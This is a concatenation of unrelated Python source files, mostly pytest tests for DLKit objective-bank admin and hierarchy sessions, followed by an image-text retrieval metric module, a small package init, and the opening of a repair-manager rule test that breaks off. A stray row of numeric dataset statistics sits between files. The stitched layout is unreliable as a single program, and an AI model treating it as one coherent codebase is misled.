catalogs = self.svc_mgr.get_objective_banks()
assert catalogs.available() > 0
assert isinstance(catalogs, ABCObjects.ObjectiveBankList)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_banks()
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_bank_admin_session_class_fixture(request):
# From test_templates/resource.py::BinAdminSession::init_template
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.fake_id = Id('resource.Resource%3Afake%40DLKIT.MIT.EDU')
@pytest.fixture(scope="function")
def objective_bank_admin_session_test_fixture(request):
# From test_templates/resource.py::BinAdminSession::init_template
if not is_never_authz(request.cls.service_config):
# Initialize test catalog:
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank'
create_form.description = 'Test ObjectiveBank for ObjectiveBankAdminSession tests'
request.cls.catalog = request.cls.svc_mgr.create_objective_bank(create_form)
# Initialize catalog to be deleted:
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'Test ObjectiveBank For Deletion'
create_form.description = 'Test ObjectiveBank for ObjectiveBankAdminSession deletion test'
request.cls.catalog_to_delete = request.cls.svc_mgr.create_objective_bank(create_form)
request.cls.session = request.cls.svc_mgr
def test_tear_down():
if not is_never_authz(request.cls.service_config):
for catalog in request.cls.svc_mgr.get_objective_banks():
request.cls.svc_mgr.delete_objective_bank(catalog.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("objective_bank_admin_session_class_fixture", "objective_bank_admin_session_test_fixture")
class TestObjectiveBankAdminSession(object):
"""Tests for ObjectiveBankAdminSession"""
def test_can_create_objective_banks(self):
"""Tests can_create_objective_banks"""
# From test_templates/resource.py BinAdminSession.can_create_bins_template
assert isinstance(self.svc_mgr.can_create_objective_banks(), bool)
def test_can_create_objective_bank_with_record_types(self):
"""Tests can_create_objective_bank_with_record_types"""
# From test_templates/resource.py BinAdminSession.can_create_bin_with_record_types_template
assert isinstance(self.svc_mgr.can_create_objective_bank_with_record_types(DEFAULT_TYPE), bool)
def test_get_objective_bank_form_for_create(self):
"""Tests get_objective_bank_form_for_create"""
# From test_templates/resource.py BinAdminSession.get_bin_form_for_create_template
if not is_never_authz(self.service_config):
catalog_form = self.svc_mgr.get_objective_bank_form_for_create([])
assert isinstance(catalog_form, OsidCatalogForm)
assert not catalog_form.is_for_update()
with pytest.raises(errors.InvalidArgument):
self.svc_mgr.get_objective_bank_form_for_create([1])
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_bank_form_for_create([])
def test_create_objective_bank(self):
"""Tests create_objective_bank"""
# From test_templates/resource.py BinAdminSession.create_bin_template
from dlkit.abstract_osid.learning.objects import ObjectiveBank
if not is_never_authz(self.service_config):
catalog_form = self.svc_mgr.get_objective_bank_form_for_create([])
catalog_form.display_name = 'Test ObjectiveBank'
catalog_form.description = 'Test ObjectiveBank for ObjectiveBankAdminSession.create_objective_bank tests'
new_catalog = self.svc_mgr.create_objective_bank(catalog_form)
assert isinstance(new_catalog, OsidCatalog)
with pytest.raises(errors.IllegalState):
self.svc_mgr.create_objective_bank(catalog_form)
with pytest.raises(errors.InvalidArgument):
self.svc_mgr.create_objective_bank('I Will Break You!')
update_form = self.svc_mgr.get_objective_bank_form_for_update(new_catalog.ident)
with pytest.raises(errors.InvalidArgument):
self.svc_mgr.create_objective_bank(update_form)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.create_objective_bank('foo')
def test_can_update_objective_banks(self):
"""Tests can_update_objective_banks"""
# From test_templates/resource.py BinAdminSession.can_update_bins_template
assert isinstance(self.svc_mgr.can_update_objective_banks(), bool)
def test_get_objective_bank_form_for_update(self):
"""Tests get_objective_bank_form_for_update"""
# From test_templates/resource.py BinAdminSession.get_bin_form_for_update_template
from dlkit.abstract_osid.learning.objects import ObjectiveBankForm
if not is_never_authz(self.service_config):
catalog_form = self.svc_mgr.get_objective_bank_form_for_update(self.catalog.ident)
assert isinstance(catalog_form, OsidCatalogForm)
assert catalog_form.is_for_update()
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_bank_form_for_update(self.fake_id)
def test_update_objective_bank(self):
"""Tests update_objective_bank"""
# From test_templates/resource.py BinAdminSession.update_bin_template
if not is_never_authz(self.service_config):
catalog_form = self.svc_mgr.get_objective_bank_form_for_update(self.catalog.ident)
# Update some elements here?
self.svc_mgr.update_objective_bank(catalog_form)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.update_objective_bank('foo')
def test_can_delete_objective_banks(self):
"""Tests can_delete_objective_banks"""
# From test_templates/resource.py BinAdminSession.can_delete_bins_template
assert isinstance(self.svc_mgr.can_delete_objective_banks(), bool)
def test_delete_objective_bank(self):
"""Tests delete_objective_bank"""
# From test_templates/resource.py BinAdminSession.delete_bin_template
if not is_never_authz(self.service_config):
cat_id = self.catalog_to_delete.ident
self.svc_mgr.delete_objective_bank(cat_id)
with pytest.raises(errors.NotFound):
self.svc_mgr.get_objective_bank(cat_id)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.delete_objective_bank(self.fake_id)
def test_can_manage_objective_bank_aliases(self):
"""Tests can_manage_objective_bank_aliases"""
# From test_templates/resource.py::ResourceAdminSession::can_manage_resource_aliases_template
assert isinstance(self.svc_mgr.can_manage_objective_bank_aliases(), bool)
def test_alias_objective_bank(self):
"""Tests alias_objective_bank"""
# From test_templates/resource.py BinAdminSession.alias_bin_template
alias_id = Id('learning.ObjectiveBank%3Amy-alias%40ODL.MIT.EDU')
if not is_never_authz(self.service_config):
self.svc_mgr.alias_objective_bank(self.catalog_to_delete.ident, alias_id)
aliased_catalog = self.svc_mgr.get_objective_bank(alias_id)
assert self.catalog_to_delete.ident == aliased_catalog.ident
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.alias_objective_bank(self.fake_id, alias_id)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_bank_hierarchy_session_class_fixture(request):
# From test_templates/resource.py::BinHierarchySession::init_template
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.catalogs = dict()
request.cls.fake_id = Id('resource.Resource%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
for name in ['Root', 'Child 1', 'Child 2', 'Grandchild 1']:
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = name
create_form.description = 'Test ObjectiveBank ' + name
request.cls.catalogs[name] = request.cls.svc_mgr.create_objective_bank(create_form)
request.cls.svc_mgr.add_root_objective_bank(request.cls.catalogs['Root'].ident)
request.cls.svc_mgr.add_child_objective_bank(request.cls.catalogs['Root'].ident, request.cls.catalogs['Child 1'].ident)
request.cls.svc_mgr.add_child_objective_bank(request.cls.catalogs['Root'].ident, request.cls.catalogs['Child 2'].ident)
request.cls.svc_mgr.add_child_objective_bank(request.cls.catalogs['Child 1'].ident, request.cls.catalogs['Grandchild 1'].ident)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
request.cls.svc_mgr.remove_child_objective_bank(request.cls.catalogs['Child 1'].ident, request.cls.catalogs['Grandchild 1'].ident)
request.cls.svc_mgr.remove_child_objective_banks(request.cls.catalogs['Root'].ident)
request.cls.svc_mgr.remove_root_objective_bank(request.cls.catalogs['Root'].ident)
for cat_name in request.cls.catalogs:
request.cls.svc_mgr.delete_objective_bank(request.cls.catalogs[cat_name].ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def objective_bank_hierarchy_session_test_fixture(request):
# From test_templates/resource.py::BinHierarchySession::init_template
request.cls.session = request.cls.svc_mgr
@pytest.mark.usefixtures("objective_bank_hierarchy_session_class_fixture", "objective_bank_hierarchy_session_test_fixture")
class TestObjectiveBankHierarchySession(object):
"""Tests for ObjectiveBankHierarchySession"""
def test_get_objective_bank_hierarchy_id(self):
"""Tests get_objective_bank_hierarchy_id"""
# From test_templates/resource.py::BinHierarchySession::get_bin_hierarchy_id_template
hierarchy_id = self.svc_mgr.get_objective_bank_hierarchy_id()
assert isinstance(hierarchy_id, Id)
def test_get_objective_bank_hierarchy(self):
"""Tests get_objective_bank_hierarchy"""
# From test_templates/resource.py::BinHierarchySession::get_bin_hierarchy_template
if not is_never_authz(self.service_config):
hierarchy = self.svc_mgr.get_objective_bank_hierarchy()
assert isinstance(hierarchy, Hierarchy)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_bank_hierarchy()
def test_can_access_objective_bank_hierarchy(self):
"""Tests can_access_objective_bank_hierarchy"""
# From test_templates/resource.py::BinHierarchySession::can_access_objective_bank_hierarchy_template
assert isinstance(self.svc_mgr.can_access_objective_bank_hierarchy(), bool)
def test_use_comparative_objective_bank_view(self):
"""Tests use_comparative_objective_bank_view"""
# From test_templates/resource.py::BinLookupSession::use_comparative_bin_view_template
self.svc_mgr.use_comparative_objective_bank_view()
def test_use_plenary_objective_bank_view(self):
"""Tests use_plenary_objective_bank_view"""
# From test_templates/resource.py::BinLookupSession::use_plenary_bin_view_template
self.svc_mgr.use_plenary_objective_bank_view()
def test_get_root_objective_bank_ids(self):
"""Tests get_root_objective_bank_ids"""
# From test_templates/resource.py::BinHierarchySession::get_root_bin_ids_template
if not is_never_authz(self.service_config):
root_ids = self.svc_mgr.get_root_objective_bank_ids()
assert isinstance(root_ids, IdList)
# probably should be == 1, but we seem to be getting test cruft,
# and I can't pinpoint where it's being introduced.
assert root_ids.available() >= 1
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_root_objective_bank_ids()
def test_get_root_objective_banks(self):
"""Tests get_root_objective_banks"""
# From test_templates/resource.py::BinHierarchySession::get_root_bins_template
from dlkit.abstract_osid.learning.objects import ObjectiveBankList
if not is_never_authz(self.service_config):
roots = self.svc_mgr.get_root_objective_banks()
assert isinstance(roots, OsidList)
assert roots.available() == 1
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_root_objective_banks()
def test_has_parent_objective_banks(self):
"""Tests has_parent_objective_banks"""
# From test_templates/resource.py::BinHierarchySession::has_parent_bins_template
if not is_never_authz(self.service_config):
assert isinstance(self.svc_mgr.has_parent_objective_banks(self.catalogs['Child 1'].ident), bool)
assert self.svc_mgr.has_parent_objective_banks(self.catalogs['Child 1'].ident)
assert self.svc_mgr.has_parent_objective_banks(self.catalogs['Child 2'].ident)
assert self.svc_mgr.has_parent_objective_banks(self.catalogs['Grandchild 1'].ident)
assert not self.svc_mgr.has_parent_objective_banks(self.catalogs['Root'].ident)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.has_parent_objective_banks(self.fake_id)
def test_is_parent_of_objective_bank(self):
"""Tests is_parent_of_objective_bank"""
# From test_templates/resource.py::BinHierarchySession::is_parent_of_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.svc_mgr.is_parent_of_objective_bank(self.catalogs['Child 1'].ident, self.catalogs['Root'].ident), bool)
assert self.svc_mgr.is_parent_of_objective_bank(self.catalogs['Root'].ident, self.catalogs['Child 1'].ident)
assert self.svc_mgr.is_parent_of_objective_bank(self.catalogs['Child 1'].ident, self.catalogs['Grandchild 1'].ident)
assert not self.svc_mgr.is_parent_of_objective_bank(self.catalogs['Child 1'].ident, self.catalogs['Root'].ident)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.is_parent_of_objective_bank(self.fake_id, self.fake_id)
def test_get_parent_objective_bank_ids(self):
"""Tests get_parent_objective_bank_ids"""
# From test_templates/resource.py::BinHierarchySession::get_parent_bin_ids_template
from dlkit.abstract_osid.id.objects import IdList
if not is_never_authz(self.service_config):
catalog_list = self.svc_mgr.get_parent_objective_bank_ids(self.catalogs['Child 1'].ident)
assert isinstance(catalog_list, IdList)
assert catalog_list.available() == 1
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_parent_objective_bank_ids(self.fake_id)
def test_get_parent_objective_banks(self):
"""Tests get_parent_objective_banks"""
# From test_templates/resource.py::BinHierarchySession::get_parent_bins_template
if not is_never_authz(self.service_config):
catalog_list = self.svc_mgr.get_parent_objective_banks(self.catalogs['Child 1'].ident)
assert isinstance(catalog_list, OsidList)
assert catalog_list.available() == 1
assert catalog_list.next().display_name.text == 'Root'
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_parent_objective_banks(self.fake_id)
def test_is_ancestor_of_objective_bank(self):
"""Tests is_ancestor_of_objective_bank"""
# From test_templates/resource.py::BinHierarchySession::is_ancestor_of_bin_template
if not is_never_authz(self.service_config):
pytest.raises(errors.Unimplemented,
self.svc_mgr.is_ancestor_of_objective_bank,
self.catalogs['Root'].ident,
self.catalogs['Child 1'].ident)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.is_ancestor_of_objective_bank(self.fake_id, self.fake_id)
# self.assertTrue(isinstance(self.svc_mgr.is_ancestor_of_objective_bank(
# self.catalogs['Root'].ident,
# self.catalogs['Child 1'].ident),
# bool))
# self.assertTrue(self.svc_mgr.is_ancestor_of_objective_bank(
# self.catalogs['Root'].ident,
# self.catalogs['Child 1'].ident))
# self.assertTrue(self.svc_mgr.is_ancestor_of_objective_bank(
# self.catalogs['Root'].ident,
# self.catalogs['Grandchild 1'].ident))
# self.assertFalse(self.svc_mgr.is_ancestor_of_objective_bank(
# self.catalogs['Child 1'].ident,
# self.catalogs['Root'].ident))
def test_has_child_objective_banks(self):
"""Tests has_child_objective_banks"""
# From test_templates/resource.py::BinHierarchySession::has_child_bins_template
if not is_never_authz(self.service_config):
assert isinstance(self.svc_mgr.has_child_objective_banks(self.catalogs['Child 1'].ident), bool)
assert self.svc_mgr.has_child_objective_banks(self.catalogs['Root'].ident)
assert self.svc_mgr.has_child_objective_banks(self.catalogs['Child 1'].ident)
assert not self.svc_mgr.has_child_objective_banks(self.catalogs['Child 2'].ident)
assert not self.svc_mgr.has_child_objective_banks(self.catalogs['Grandchild 1'].ident)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.has_child_objective_banks(self.fake_id)
def test_is_child_of_objective_bank(self):
"""Tests is_child_of_objective_bank"""
# From test_templates/resource.py::BinHierarchySession::is_child_of_bin_template
if not is_never_authz(self.service_config):
assert isinstance(self.svc_mgr.is_child_of_objective_bank(self.catalogs['Child 1'].ident, self.catalogs['Root'].ident), bool)
assert self.svc_mgr.is_child_of_objective_bank(self.catalogs['Child 1'].ident, self.catalogs['Root'].ident)
assert self.svc_mgr.is_child_of_objective_bank(self.catalogs['Grandchild 1'].ident, self.catalogs['Child 1'].ident)
assert not self.svc_mgr.is_child_of_objective_bank(self.catalogs['Root'].ident, self.catalogs['Child 1'].ident)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.is_child_of_objective_bank(self.fake_id, self.fake_id)
def test_get_child_objective_bank_ids(self):
"""Tests get_child_objective_bank_ids"""
# From test_templates/resource.py::BinHierarchySession::get_child_bin_ids_template
from dlkit.abstract_osid.id.objects import IdList
if not is_never_authz(self.service_config):
catalog_list = self.svc_mgr.get_child_objective_bank_ids(self.catalogs['Child 1'].ident)
assert isinstance(catalog_list, IdList)
assert catalog_list.available() == 1
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_child_objective_bank_ids(self.fake_id)
def test_get_child_objective_banks(self):
"""Tests get_child_objective_banks"""
# From test_templates/resource.py::BinHierarchySession::get_child_bins_template
if not is_never_authz(self.service_config):
catalog_list = self.svc_mgr.get_child_objective_banks(self.catalogs['Child 1'].ident)
assert isinstance(catalog_list, OsidList)
assert catalog_list.available() == 1
assert catalog_list.next().display_name.text == 'Grandchild 1'
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_child_objective_banks(self.fake_id)
def test_is_descendant_of_objective_bank(self):
"""Tests is_descendant_of_objective_bank"""
# From test_templates/resource.py::BinHierarchySession::is_descendant_of_bin_template
if not is_never_authz(self.service_config):
pytest.raises(errors.Unimplemented,
self.svc_mgr.is_descendant_of_objective_bank,
self.catalogs['Child 1'].ident,
self.catalogs['Root'].ident)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.is_descendant_of_objective_bank(self.fake_id, self.fake_id)
# self.assertTrue(isinstance(self.svc_mgr.is_descendant_of_objective_bank(
# self.catalogs['Root'].ident,
# self.catalogs['Child 1'].ident),
# bool))
# self.assertTrue(self.svc_mgr.is_descendant_of_objective_bank(
# self.catalogs['Child 1'].ident,
# self.catalogs['Root'].ident))
# self.assertTrue(self.svc_mgr.is_descendant_of_objective_bank(
# self.catalogs['Grandchild 1'].ident,
# self.catalogs['Root'].ident))
# self.assertFalse(self.svc_mgr.is_descendant_of_objective_bank(
# self.catalogs['Root'].ident,
# self.catalogs['Child 1'].ident))
def test_get_objective_bank_node_ids(self):
"""Tests get_objective_bank_node_ids"""
# From test_templates/resource.py::BinHierarchySession::get_bin_node_ids_template
# Per the spec, perhaps counterintuitively this method returns a
# node, **not** an IdList...
if not is_never_authz(self.service_config):
node = self.svc_mgr.get_objective_bank_node_ids(self.catalogs['Child 1'].ident, 1, 2, False)
assert isinstance(node, OsidNode)
assert not node.is_root()
assert not node.is_leaf()
assert node.get_child_ids().available() == 1
assert isinstance(node.get_child_ids(), IdList)
assert node.get_parent_ids().available() == 1
assert isinstance(node.get_parent_ids(), IdList)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_bank_node_ids(self.fake_id, 1, 2, False)
def test_get_objective_bank_nodes(self):
"""Tests get_objective_bank_nodes"""
# From test_templates/resource.py::BinHierarchySession::get_bin_nodes_template
if not is_never_authz(self.service_config):
node = self.svc_mgr.get_objective_bank_nodes(self.catalogs['Child 1'].ident, 1, 2, False)
assert isinstance(node, OsidNode)
assert not node.is_root()
assert not node.is_leaf()
assert node.get_child_ids().available() == 1
assert isinstance(node.get_child_ids(), IdList)
assert node.get_parent_ids().available() == 1
assert isinstance(node.get_parent_ids(), IdList)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_bank_nodes(self.fake_id, 1, 2, False)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def objective_bank_hierarchy_design_session_class_fixture(request):
# From test_templates/resource.py::BinHierarchyDesignSession::init_template
request.cls.service_config = request.param
request.cls.svc_mgr = Runtime().get_service_manager(
'LEARNING',
proxy=PROXY,
implementation=request.cls.service_config)
request.cls.catalogs = dict()
request.cls.fake_id = Id('resource.Resource%3Afake%40DLKIT.MIT.EDU')
if not is_never_authz(request.cls.service_config):
for name in ['Root', 'Child 1', 'Child 2', 'Grandchild 1']:
create_form = request.cls.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = name
create_form.description = 'Test ObjectiveBank ' + name
request.cls.catalogs[name] = request.cls.svc_mgr.create_objective_bank(create_form)
request.cls.svc_mgr.add_root_objective_bank(request.cls.catalogs['Root'].ident)
request.cls.svc_mgr.add_child_objective_bank(request.cls.catalogs['Root'].ident, request.cls.catalogs['Child 1'].ident)
request.cls.svc_mgr.add_child_objective_bank(request.cls.catalogs['Root'].ident, request.cls.catalogs['Child 2'].ident)
request.cls.svc_mgr.add_child_objective_bank(request.cls.catalogs['Child 1'].ident, request.cls.catalogs['Grandchild 1'].ident)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
request.cls.svc_mgr.remove_child_objective_bank(request.cls.catalogs['Child 1'].ident, request.cls.catalogs['Grandchild 1'].ident)
request.cls.svc_mgr.remove_child_objective_banks(request.cls.catalogs['Root'].ident)
for cat_name in request.cls.catalogs:
request.cls.svc_mgr.delete_objective_bank(request.cls.catalogs[cat_name].ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def objective_bank_hierarchy_design_session_test_fixture(request):
# From test_templates/resource.py::BinHierarchyDesignSession::init_template
request.cls.session = request.cls.svc_mgr
@pytest.mark.usefixtures("objective_bank_hierarchy_design_session_class_fixture", "objective_bank_hierarchy_design_session_test_fixture")
class TestObjectiveBankHierarchyDesignSession(object):
"""Tests for ObjectiveBankHierarchyDesignSession"""
def test_get_objective_bank_hierarchy_id(self):
"""Tests get_objective_bank_hierarchy_id"""
# From test_templates/resource.py::BinHierarchySession::get_bin_hierarchy_id_template
hierarchy_id = self.svc_mgr.get_objective_bank_hierarchy_id()
assert isinstance(hierarchy_id, Id)
def test_get_objective_bank_hierarchy(self):
"""Tests get_objective_bank_hierarchy"""
# From test_templates/resource.py::BinHierarchySession::get_bin_hierarchy_template
if not is_never_authz(self.service_config):
hierarchy = self.svc_mgr.get_objective_bank_hierarchy()
assert isinstance(hierarchy, Hierarchy)
else:
with pytest.raises(errors.PermissionDenied):
self.svc_mgr.get_objective_bank_hierarchy()
def test_can_modify_objective_bank_hierarchy(self):
"""Tests can_modify_objective_bank_hierarchy"""
# From test_templates/resource.py::BinHierarchyDesignSession::can_modify_bin_hierarchy_template
assert isinstance(self.session.can_modify_objective_bank_hierarchy(), bool)
def test_add_root_objective_bank(self):
"""Tests add_root_objective_bank"""
# From test_templates/resource.py::BinHierarchyDesignSession::add_root_bin_template
# this is tested in the setUpClass
if not is_never_authz(self.service_config):
roots = self.session.get_root_objective_banks()
assert isinstance(roots, OsidList)
assert roots.available() == 1
else:
with pytest.raises(errors.PermissionDenied):
self.session.add_root_objective_bank(self.fake_id)
def test_remove_root_objective_bank(self):
"""Tests remove_root_objective_bank"""
# From test_templates/resource.py::BinHierarchyDesignSession::remove_root_bin_template
if not is_never_authz(self.service_config):
roots = self.session.get_root_objective_banks()
assert roots.available() == 1
create_form = self.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'new root'
create_form.description = 'Test ObjectiveBank root'
new_objective_bank = self.svc_mgr.create_objective_bank(create_form)
self.svc_mgr.add_root_objective_bank(new_objective_bank.ident)
roots = self.session.get_root_objective_banks()
assert roots.available() == 2
self.session.remove_root_objective_bank(new_objective_bank.ident)
roots = self.session.get_root_objective_banks()
assert roots.available() == 1
else:
with pytest.raises(errors.PermissionDenied):
self.session.remove_root_objective_bank(self.fake_id)
def test_add_child_objective_bank(self):
"""Tests add_child_objective_bank"""
# From test_templates/resource.py::BinHierarchyDesignSession::add_child_bin_template
if not is_never_authz(self.service_config):
# this is tested in the setUpClass
children = self.session.get_child_objective_banks(self.catalogs['Root'].ident)
assert isinstance(children, OsidList)
assert children.available() == 2
else:
with pytest.raises(errors.PermissionDenied):
self.session.add_child_objective_bank(self.fake_id, self.fake_id)
def test_remove_child_objective_bank(self):
"""Tests remove_child_objective_bank"""
# From test_templates/resource.py::BinHierarchyDesignSession::remove_child_bin_template
if not is_never_authz(self.service_config):
children = self.session.get_child_objective_banks(self.catalogs['Root'].ident)
assert children.available() == 2
create_form = self.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'test child'
create_form.description = 'Test ObjectiveBank child'
new_objective_bank = self.svc_mgr.create_objective_bank(create_form)
self.svc_mgr.add_child_objective_bank(
self.catalogs['Root'].ident,
new_objective_bank.ident)
children = self.session.get_child_objective_banks(self.catalogs['Root'].ident)
assert children.available() == 3
self.session.remove_child_objective_bank(
self.catalogs['Root'].ident,
new_objective_bank.ident)
children = self.session.get_child_objective_banks(self.catalogs['Root'].ident)
assert children.available() == 2
else:
with pytest.raises(errors.PermissionDenied):
self.session.remove_child_objective_bank(self.fake_id, self.fake_id)
def test_remove_child_objective_banks(self):
"""Tests remove_child_objective_banks"""
# From test_templates/resource.py::BinHierarchyDesignSession::remove_child_bins_template
if not is_never_authz(self.service_config):
children = self.session.get_child_objective_banks(self.catalogs['Grandchild 1'].ident)
assert children.available() == 0
create_form = self.svc_mgr.get_objective_bank_form_for_create([])
create_form.display_name = 'test great grandchild'
create_form.description = 'Test ObjectiveBank child'
new_objective_bank = self.svc_mgr.create_objective_bank(create_form)
self.svc_mgr.add_child_objective_bank(
self.catalogs['Grandchild 1'].ident,
new_objective_bank.ident)
children = self.session.get_child_objective_banks(self.catalogs['Grandchild 1'].ident)
assert children.available() == 1
self.session.remove_child_objective_banks(self.catalogs['Grandchild 1'].ident)
children = self.session.get_child_objective_banks(self.catalogs['Grandchild 1'].ident)
assert children.available() == 0
else:
with pytest.raises(errors.PermissionDenied):
self.session.remove_child_objective_banks(self.fake_id)
# File: machine_translation_vision/utils/im_retrieval_eval.py (repo: Eurus-Holmes/VAG-NMT, Apache-2.0)
import torch
import numpy as np
def t2i(images, captions):
"""
Text -> Image
Images: (N,K) matrix of images
Captions: (N,K) matrix of captions
"""
npts = images.shape[0] #Define the number of images
#Initialize the ranks
ranks = np.zeros(npts)
for index in range(npts):
#Get query captions
queries = captions[index].unsqueeze(0)
#Compute Scores
d = torch.mm(queries, images.t())
d_sorted, inds = torch.sort(d, descending=True)
inds = inds.squeeze(0).cpu().numpy()
ranks[index] = np.where(inds == index)[0][0]
#compute metrics
r1 = 100.0 * len(np.where(ranks < 1)[0]) / len(ranks)
r5 = 100.0 * len(np.where(ranks < 5)[0]) / len(ranks)
r10 = 100.0 * len(np.where(ranks < 10)[0]) / len(ranks)
medr = np.floor(np.median(ranks)) + 1
return (r1, r5, r10, medr)
def i2t(images, captions):
"""
Image -> Text
Images: (N,K) matrix of images
Captions: (N,K) matrix of captions
"""
npts = images.shape[0] #Define the number of images
#Initialize the ranks
ranks = np.zeros(npts)
for index in range(npts):
#Get query captions
queries = images[index].unsqueeze(0)
#Compute Scores
d = torch.mm(queries, captions.t())
d_sorted, inds = torch.sort(d, descending=True)
inds = inds.squeeze(0).cpu().numpy()
ranks[index] = np.where(inds == index)[0][0]
#compute metrics
r1 = 100.0 * len(np.where(ranks < 1)[0]) / len(ranks)
r5 = 100.0 * len(np.where(ranks < 5)[0]) / len(ranks)
r10 = 100.0 * len(np.where(ranks < 10)[0]) / len(ranks)
medr = np.floor(np.median(ranks)) + 1
return (r1, r5, r10, medr)
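The `t2i`/`i2t` routines above reduce to one idea: rank candidates by similarity and report Recall@K and median rank of the true match. A minimal NumPy-only sketch of the same Recall@K computation (the `recall_at_k` helper is illustrative, not part of this module; the true match is assumed to sit on the diagonal):

```python
import numpy as np

def recall_at_k(scores, k):
    # scores[i, j]: similarity of query i to candidate j; the true
    # match for query i is assumed to be candidate j == i.
    n = scores.shape[0]
    ranks = np.empty(n, dtype=int)
    for i in range(n):
        order = np.argsort(-scores[i])          # candidates, best first
        ranks[i] = np.where(order == i)[0][0]   # position of the true match
    return 100.0 * np.sum(ranks < k) / n

# With identity scores every query ranks its own candidate first.
print(recall_at_k(np.eye(4), 1))  # -> 100.0
```

This mirrors the per-query loop above, with `np.argsort` on negated scores standing in for `torch.sort(d, descending=True)`.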
# File: datebar/__init__.py (repo: Neulana/datebar, MIT)
from .date_bar import draw
from .date_bar import get_percent
def main():
draw()
| 12.285714 | 33 | 0.72093 | 14 | 86 | 4.214286 | 0.642857 | 0.271186 | 0.372881 | 0.576271 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.197674 | 86 | 6 | 34 | 14.333333 | 0.855072 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 8 |
# File: tests/versioned-libs/testlib-1.0/testlib.py (repo: mitsuhiko/multiversion, BSD-3-Clause)
def a_function():
return 'from version 1.0'
# File: src/RepairManager/test/test_rule.py (repo: Anbang-Hu/DLWorkspace, MIT)
#!/usr/bin/env python3
import logging
import os
import sys
import unittest
sys.path.append(os.path.abspath("../src/"))
from util import State, Node, Job
from rule import Rule, UnschedulableRule, K8sGpuRule, \
DcgmEccDBERule, InfinibandRule, IPoIBRule, NvPeerMemRule, NVSMRule, \
instantiate_rules
logger = logging.getLogger(__name__)
class MockPrometheusUtil(object):
def __init__(self):
self.data = []
def query(self, query):
try:
return self.data.pop(0)
except IndexError:
return None
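The stub above implements a simple FIFO response queue: each `query` call pops the next canned result and returns `None` once the queue is exhausted. A standalone sketch of the same pattern (the generic `FifoStub` name is illustrative, not from this codebase):

```python
class FifoStub:
    """Returns queued canned responses in order; None when exhausted."""

    def __init__(self):
        self.data = []

    def query(self, _query):
        # Pop the oldest queued response, ignoring the query text.
        try:
            return self.data.pop(0)
        except IndexError:
            return None

stub = FifoStub()
stub.data.extend(["first", "second"])
print(stub.query("up"))  # -> first
print(stub.query("up"))  # -> second
print(stub.query("up"))  # -> None
```

Tests that need multiple sequential query results (e.g. a "current" and a historical value per metric) just append responses in the order the code under test will consume them.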
class TestRuleInstantiation(unittest.TestCase):
def test_rule_instantiation(self):
# Sanity check on all rules
rules = instantiate_rules()
for rule in rules:
self.assertTrue(rule.name in Rule.subclasses)
class TestRule(unittest.TestCase):
